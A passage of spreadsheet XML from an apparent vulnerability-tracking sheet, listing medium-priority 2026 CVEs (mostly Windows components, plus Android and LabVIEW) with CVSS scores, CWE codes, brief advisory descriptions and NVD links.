r="P723" s="5" t="inlineStr" /><c r="Q723" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R723" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="S723" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69625</t></is></c></row><row r="724"><c r="A724" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B724" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C724" s="5" t="inlineStr"><is><t>CVE-2026-69643</t></is></c><c r="D724" s="5" t="n"><v>8</v></c><c r="E724" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F724" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G724" s="5" t="inlineStr" /><c r="H724" s="5" t="n"><v>0.008</v></c><c r="I724" s="5" t="inlineStr" /><c r="J724" s="5" t="inlineStr" /><c r="K724" s="5" t="inlineStr" /><c r="L724" s="5" t="inlineStr" /><c r="M724" s="5" t="inlineStr" /><c r="N724" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O724" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P724" s="5" t="inlineStr" /><c r="Q724" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R724" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S724" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69643</t></is></c></row><row r="725"><c r="A725" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B725" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C725" s="5" t="inlineStr"><is><t>CVE-2026-69681</t></is></c><c r="D725" s="5" t="n"><v>8</v></c><c r="E725" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F725" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G725" s="5" t="inlineStr" /><c r="H725" s="5" t="n"><v>0.008</v></c><c r="I725" s="5" t="inlineStr" /><c r="J725" s="5" t="inlineStr" /><c r="K725" s="5" t="inlineStr" /><c r="L725" s="5" t="inlineStr" /><c r="M725" s="5" t="inlineStr" /><c r="N725" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O725" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P725" s="5" t="inlineStr" /><c r="Q725" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R725" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S725" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69681</t></is></c></row><row r="726"><c r="A726" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B726" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C726" s="5" t="inlineStr"><is><t>CVE-2026-69689</t></is></c><c r="D726" s="5" t="n"><v>8</v></c><c r="E726" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F726" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G726" s="5" t="inlineStr" /><c r="H726" s="5" t="n"><v>0.008</v></c><c r="I726" s="5" t="inlineStr" /><c r="J726" s="5" t="inlineStr" /><c r="K726" s="5" t="inlineStr" /><c r="L726" s="5" t="inlineStr" /><c r="M726" s="5" t="inlineStr" /><c r="N726" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O726" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P726" s="5" t="inlineStr" /><c r="Q726" s="5" t="inlineStr"><is><t>CWE-121, CWE-125</t></is></c><c r="R726" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S726" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69689</t></is></c></row><row r="727"><c r="A727" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B727" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C727" s="5" t="inlineStr"><is><t>CVE-2026-69714</t></is></c><c r="D727" s="5" t="n"><v>8</v></c><c r="E727" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F727" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G727" s="5" t="inlineStr" /><c r="H727" s="5" t="n"><v>0.008</v></c><c r="I727" s="5" t="inlineStr" /><c r="J727" s="5" t="inlineStr" /><c r="K727" s="5" t="inlineStr" /><c r="L727" s="5" t="inlineStr" /><c r="M727" s="5" t="inlineStr" /><c r="N727" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O727" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P727" s="5" t="inlineStr" /><c r="Q727" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R727" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Device Association Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S727" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69714</t></is></c></row><row r="728"><c r="A728" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B728" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C728" s="5" t="inlineStr"><is><t>CVE-2026-69717</t></is></c><c r="D728" s="5" t="n"><v>8</v></c><c r="E728" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F728" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G728" s="5" t="inlineStr" /><c r="H728" s="5" t="n"><v>0.007</v></c><c r="I728" s="5" t="inlineStr" /><c r="J728" s="5" t="inlineStr" /><c r="K728" s="5" t="inlineStr" /><c r="L728" s="5" t="inlineStr" /><c r="M728" s="5" t="inlineStr" /><c r="N728" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O728" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P728" s="5" t="inlineStr" /><c r="Q728" s="5" t="inlineStr"><is><t>CWE-125, CWE-822, CWE-843</t></is></c><c r="R728" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Group Policy allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S728" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69717</t></is></c></row><row r="729"><c r="A729" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B729" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C729" s="5" t="inlineStr"><is><t>CVE-2026-69727</t></is></c><c r="D729" s="5" t="n"><v>8</v></c><c r="E729" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F729" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G729" s="5" t="inlineStr" /><c r="H729" s="5" t="n"><v>0.007</v></c><c r="I729" s="5" t="inlineStr" /><c r="J729" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K72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729" s="5" t="inlineStr" /><c r="M729" s="5" t="inlineStr" /><c r="N729" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O729" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P729" s="5" t="inlineStr" /><c r="Q729" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R729" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S729" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69727</t></is></c></row><row r="730"><c r="A730" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B730" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C730" s="5" t="inlineStr"><is><t>CVE-2026-69762</t></is></c><c r="D730" s="5" t="n"><v>8</v></c><c r="E730" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F730" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G730" s="5" t="inlineStr" /><c r="H730" s="5" t="n"><v>0.007</v></c><c r="I730" s="5" t="inlineStr" /><c r="J730" s="5" t="inlineStr" /><c r="K730" s="5" t="inlineStr" /><c r="L730" s="5" t="inlineStr" /><c r="M730" s="5" t="inlineStr" /><c r="N730" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O730" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P730" s="5" t="inlineStr" /><c r="Q730" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R730" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S730" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69762</t></is></c></row><row r="731"><c r="A731" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B731" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C731" s="5" t="inlineStr"><is><t>CVE-2026-69773</t></is></c><c r="D731" s="5" t="n"><v>8</v></c><c r="E731" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F731" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G731" s="5" t="inlineStr" /><c r="H731" s="5" t="n"><v>0.007</v></c><c r="I731" s="5" t="inlineStr" /><c r="J731" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K7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731" s="5" t="inlineStr" /><c r="M731" s="5" t="inlineStr" /><c r="N731" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O731" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P731" s="5" t="inlineStr" /><c r="Q731" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R731" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S731" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69773</t></is></c></row><row r="732"><c r="A732" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B732" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C732" s="5" t="inlineStr"><is><t>CVE-2026-69777</t></is></c><c r="D732" s="5" t="n"><v>8</v></c><c r="E732" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F732" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G732" s="5" t="inlineStr" /><c r="H732" s="5" t="n"><v>0.005</v></c><c r="I732" s="5" t="inlineStr" /><c r="J732" s="5" t="inlineStr" /><c r="K732" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L732" s="5" t="inlineStr" /><c r="M732" s="5" t="inlineStr" /><c r="N732" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O732" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P732" s="5" t="inlineStr" /><c r="Q732" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R732" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows DHCP Client allows an authorized attacker to elevate privileges over an adjacent network.</t></is></c><c r="S732" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69777</t></is></c></row><row r="733"><c r="A733" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B733" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C733" s="5" t="inlineStr"><is><t>CVE-2026-69807</t></is></c><c r="D733" s="5" t="n"><v>8</v></c><c r="E733" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F733" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G733" s="5" t="inlineStr" /><c r="H733" s="5" t="n"><v>0.008999999999999999</v></c><c r="I733" s="5" t="inlineStr" /><c r="J733" s="5" t="inlineStr" /><c r="K733" s="5" t="inlineStr" /><c r="L733" s="5" t="inlineStr" /><c r="M733" s="5" t="inlineStr" /><c r="N733" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O733" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P733" s="5" t="inlineStr" /><c r="Q733" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R733" s="5" t="inlineStr"><is><t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows PowerShell allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S733" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69807</t></is></c></row><row r="734"><c r="A734" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B734" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C734" s="5" t="inlineStr"><is><t>CVE-2026-69826</t></is></c><c r="D734" s="5" t="n"><v>8</v></c><c r="E734" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F734" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G734" s="5" t="inlineStr" /><c r="H734" s="5" t="n"><v>0.007</v></c><c r="I734" s="5" t="inlineStr" /><c r="J734" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K73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734" s="5" t="inlineStr" /><c r="M734" s="5" t="inlineStr" /><c r="N734" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O734" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P734" s="5" t="inlineStr" /><c r="Q734" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R734" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S734" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69826</t></is></c></row><row r="735"><c r="A735" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B735" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C735" s="5" t="inlineStr"><is><t>CVE-2026-69847</t></is></c><c r="D735" s="5" t="n"><v>8</v></c><c r="E735" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F735" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G735" s="5" t="inlineStr" /><c r="H735" s="5" t="n"><v>0.005</v></c><c r="I735" s="5" t="inlineStr" /><c r="J735" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K7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735" s="5" t="inlineStr" /><c r="M735" s="5" t="inlineStr" /><c r="N735" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O735" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P735" s="5" t="inlineStr" /><c r="Q735" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R735" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t></is></c><c r="S735" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69847</t></is></c></row><row r="736"><c r="A736" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B736" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C736" s="5" t="inlineStr"><is><t>CVE-2026-69875</t></is></c><c r="D736" s="5" t="n"><v>8</v></c><c r="E736" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F736" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G736" s="5" t="inlineStr" /><c r="H736" s="5" t="n"><v>0.008</v></c><c r="I736" s="5" t="inlineStr" /><c r="J736" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K73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736" s="5" t="inlineStr" /><c r="M736" s="5" t="inlineStr" /><c r="N736" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O736" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P736" s="5" t="inlineStr" /><c r="Q736" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="R736" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="S736" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69875</t></is></c></row><row r="737"><c r="A737" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B737" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C737" s="5" t="inlineStr"><is><t>CVE-2026-69876</t></is></c><c r="D737" s="5" t="n"><v>8</v></c><c r="E737" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F737" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G737" s="5" t="inlineStr" /><c r="H737" s="5" t="n"><v>0.006</v></c><c r="I737" s="5" t="inlineStr" /><c r="J737" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K737" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L737" s="5" t="inlineStr" /><c r="M737" s="5" t="inlineStr" /><c r="N737" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O737" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P737" s="5" t="inlineStr" /><c r="Q737" s="5" t="inlineStr"><is><t>CWE-415, CWE-416</t></is></c><c r="R737" s="5" t="inlineStr"><is><t>Use after free in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t></is></c><c r="S737" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69876</t></is></c></row><row r="738"><c r="A738" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B738" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C738" s="5" t="inlineStr"><is><t>CVE-2026-76139</t></is></c><c r="D738" s="5" t="n"><v>8</v></c><c r="E738" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F738" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G738" s="5" t="inlineStr" /><c r="H738" s="5" t="n"><v>0.004</v></c><c r="I738" s="5" t="inlineStr" /><c r="J738" s="5" t="inlineStr" /><c r="K738" s="5" t="inlineStr" /><c r="L738" s="5" t="inlineStr" /><c r="M738" s="5" t="inlineStr" /><c r="N738" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O738" s="5" t="inlineStr"><is><t>2026-08-19</t></is></c><c r="P738" s="5" t="inlineStr" /><c r="Q738" s="5" t="inlineStr"><is><t>CWE-829</t></is></c><c r="R738" s="5" t="inlineStr"><is><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is></c><c r="S738" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76139</t></is></c></row><row r="739"><c r="A739" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B739" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C739" s="5" t="inlineStr"><is><t>CVE-2026-83948</t></is></c><c r="D739" s="5" t="n"><v>8</v></c><c r="E739" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F739" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G739" s="5" t="inlineStr" /><c r="H739" s="5" t="n"><v>0.004</v></c><c r="I739" s="5" t="inlineStr" /><c r="J739" s="5" t="inlineStr" /><c r="K739" s="5" t="inlineStr"><is><t>microsoft:vm_repair</t></is></c><c r="L739" s="5" t="inlineStr" /><c r="M739" s="5" t="inlineStr" /><c r="N739" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O739" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P739" s="5" t="inlineStr" /><c r="Q739" s="5" t="inlineStr"><is><t>CWE-77</t></is></c><c r="R739" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in a command ('command injection') in Microsoft Azure CLI allows an authorized attacker to execute code over a network.</t></is></c><c r="S739" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83948</t></is></c></row><row r="740"><c r="A740" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B740" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C740" s="5" t="inlineStr"><is><t>CVE-2026-84934</t></is></c><c r="D740" s="5" t="n"><v>8</v></c><c r="E740" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F740" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G740" s="5" t="inlineStr" /><c r="H740" s="5" t="n"><v>0.002</v></c><c r="I740" s="5" t="inlineStr" /><c r="J740" s="5" t="inlineStr" /><c r="K740" s="5" t="inlineStr" /><c r="L740" s="5" t="inlineStr" /><c r="M740" s="5" t="inlineStr" /><c r="N740" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O740" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P740" s="5" t="inlineStr" /><c r="Q740" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R740" s="5" t="inlineStr"><is><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is></c><c r="S740" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84934</t></is></c></row><row r="741"><c r="A741" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B741" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C741" s="5" t="inlineStr"><is><t>CVE-2026-84935</t></is></c><c r="D741" s="5" t="n"><v>8</v></c><c r="E741" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F741" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G741" s="5" t="inlineStr" /><c r="H741" s="5" t="n"><v>0.002</v></c><c r="I741" s="5" t="inlineStr" /><c r="J741" s="5" t="inlineStr" /><c r="K741" s="5" t="inlineStr" /><c r="L741" s="5" t="inlineStr" /><c r="M741" s="5" t="inlineStr" /><c r="N741" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O741" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P741" s="5" t="inlineStr" /><c r="Q741" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R741" s="5" t="inlineStr"><is><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is></c><c r="S741" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84935</t></is></c></row><row r="742"><c r="A742" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B742" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C742" s="5" t="inlineStr"><is><t>CVE-2026-82636</t></is></c><c r="D742" s="5" t="n"><v>7.9</v></c><c r="E742" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F742" s="5" t="inlineStr"><is><t>cve@mitre.org</t></is></c><c r="G742" s="5" t="inlineStr" /><c r="H742" s="5" t="n"><v>0.008</v></c><c r="I742" s="5" t="inlineStr" /><c r="J742" s="5" t="inlineStr" /><c r="K742" s="5" t="inlineStr" /><c r="L742" s="5" t="inlineStr" /><c r="M742" s="5" t="inlineStr" /><c r="N742" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O742" s="5" t="inlineStr"><is><t>2026-08-30</t></is></c><c r="P742" s="5" t="inlineStr" /><c r="Q742" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R742" s="5" t="inlineStr"><is><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is></c><c r="S742" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82636</t></is></c></row><row r="743"><c r="A743" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B743" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C743" s="5" t="inlineStr"><is><t>CVE-2026-85649</t></is></c><c r="D743" s="5" t="n"><v>7.9</v></c><c r="E743" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F743" s="5" t="inlineStr"><is><t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t></is></c><c r="G743" s="5" t="inlineStr" /><c r="H743" s="5" t="n"><v>0.002</v></c><c r="I743" s="5" t="inlineStr" /><c r="J743" s="5" t="inlineStr" /><c r="K743" s="5" t="inlineStr" /><c r="L743" s="5" t="inlineStr" /><c r="M743" s="5" t="inlineStr" /><c r="N743" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O743" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P743" s="5" t="inlineStr" /><c r="Q743" s="5" t="inlineStr"><is><t>CWE-252, CWE-636</t></is></c><c r="R743" s="5" t="inlineStr"><is><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is></c><c r="S743" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85649</t></is></c></row><row r="744"><c r="A744" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B744" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C744" s="5" t="inlineStr"><is><t>CVE-2026-0065</t></is></c><c r="D744" s="5" t="n"><v>7.8</v></c><c r="E744" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F744" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G744" s="5" t="inlineStr" /><c r="H744" s="5" t="n"><v>0.001</v></c><c r="I744" s="5" t="inlineStr" /><c r="J744" s="5" t="inlineStr" /><c r="K744" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L744" s="5" t="inlineStr" /><c r="M744" s="5" t="inlineStr" /><c r="N744" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O744" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P744" s="5" t="inlineStr" /><c r="Q744" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="R744" s="5" t="inlineStr"><is><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is></c><c r="S744" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-0065</t></is></c></row><row r="745"><c r="A745" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B745" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C745" s="5" t="inlineStr"><is><t>CVE-2026-0084</t></is></c><c r="D745" s="5" t="n"><v>7.8</v></c><c r="E745" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F745" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G745" s="5" t="inlineStr" /><c r="H745" s="5" t="n"><v>0.001</v></c><c r="I745" s="5" t="inlineStr" /><c r="J745" s="5" t="inlineStr" /><c r="K745" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L745" s="5" t="inlineStr" /><c r="M745" s="5" t="inlineStr" /><c r="N745" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O745" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P745" s="5" t="inlineStr" /><c r="Q745" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="R745" s="5" t="inlineStr"><is><t>In multiple functions of HostEmulationManager.java, there is a possible background activity launch due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S745" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-0084</t></is></c></row><row r="746"><c r="A746" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B746" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C746" s="5" t="inlineStr"><is><t>CVE-2026-18444</t></is></c><c r="D746" s="5" t="n"><v>7.8</v></c><c r="E746" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F746" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G746" s="5" t="inlineStr" /><c r="H746" s="5" t="n"><v>0.001</v></c><c r="I746" s="5" t="inlineStr" /><c r="J746" s="5" t="inlineStr" /><c r="K746" s="5" t="inlineStr"><is><t>ni:labview</t></is></c><c r="L746" s="5" t="inlineStr" /><c r="M746" s="5" t="inlineStr" /><c r="N746" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O746" s="5" t="inlineStr"><is><t>2026-08-25</t></is></c><c r="P746" s="5" t="inlineStr" /><c r="Q746" s="5" t="inlineStr"><is><t>CWE-195</t></is></c><c r="R746" s="5" t="inlineStr"><is><t>There is an integer conversion vulnerability resulting in an out-of-bounds read when loading images recently discovered in NI LabVIEW.  This may result in information disclosure or arbitrary code execution.  Successful exploitation requires an attacker to get a user to open a specially crafted VI file.  This vulnerability affects NI LabVIEW 2026 Q3 and prior versions.</t></is></c><c r="S746" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18444</t></is></c></row><row r="747"><c r="A747" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B747" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C747" s="5" t="inlineStr"><is><t>CVE-2026-18445</t></is></c><c r="D747" s="5" t="n"><v>7.8</v></c><c r="E747" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F747" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G747" s="5" t="inlineStr" /><c r="H747" s="5" t="n"><v>0.001</v></c><c r="I747" s="5" t="inlineStr" /><c r="J747" s="5" t="inlineStr" /><c r="K747" s="5" t="inlineStr"><is><t>ni:labview</t></is></c><c r="L747" s="5" t="inlineStr" /><c r="M747" s="5" t="inlineStr" /><c r="N747" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O747" s="5" t="inlineStr"><is><t>2026-08-25</t></is></c><c r="P747" s="5" t="inlineStr" /><c r="Q747" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R747" s="5" t="inlineStr"><is><t>There is an integer overflow vulnerability resulting in an out-of-bounds write recently discovered in NI LabVIEW.  This may result in information disclosure or arbitrary code execution.  Successful exploitation 